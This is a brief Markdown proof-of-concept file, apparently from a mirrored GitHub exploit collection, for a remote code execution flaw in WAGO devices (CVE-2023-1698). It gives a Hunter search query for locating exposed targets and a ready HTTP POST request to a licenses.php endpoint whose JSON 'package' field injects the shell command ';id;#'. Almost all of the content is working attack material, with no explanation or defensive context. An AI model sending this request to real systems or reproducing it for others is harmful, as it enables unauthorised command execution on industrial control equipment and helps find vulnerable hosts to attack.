mirror of
https://github.com/eeeeeeeeee-code/POC.git
synced 2025-07-29 14:04:06 +00:00
20 lines
605 B
Markdown
20 lines
605 B
Markdown
![]() |
## WAGO系统远程代码执行漏洞(CVE-2023-1698)
|
||
|
|
||
|
## 鹰图 hunter
|
||
|
```
|
||
|
web.similar_icon=="10798453453671307224"
|
||
|
```
|
||
|
## poc
|
||
|
```
|
||
|
POST /wbm/plugins/wbm-legal-information/platform/pfcXXX/licenses.php HTTP/1.1
|
||
|
Host: 127.0.0.0
|
||
|
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
|
||
|
Connection: close
|
||
|
Content-Length: 19
|
||
|
Content-Type: application/x-www-form-urlencoded
|
||
|
Accept-Encoding: gzip, deflate
|
||
|
|
||
|
{"package":";id;#"}
|
||
|
```
|
||
|

|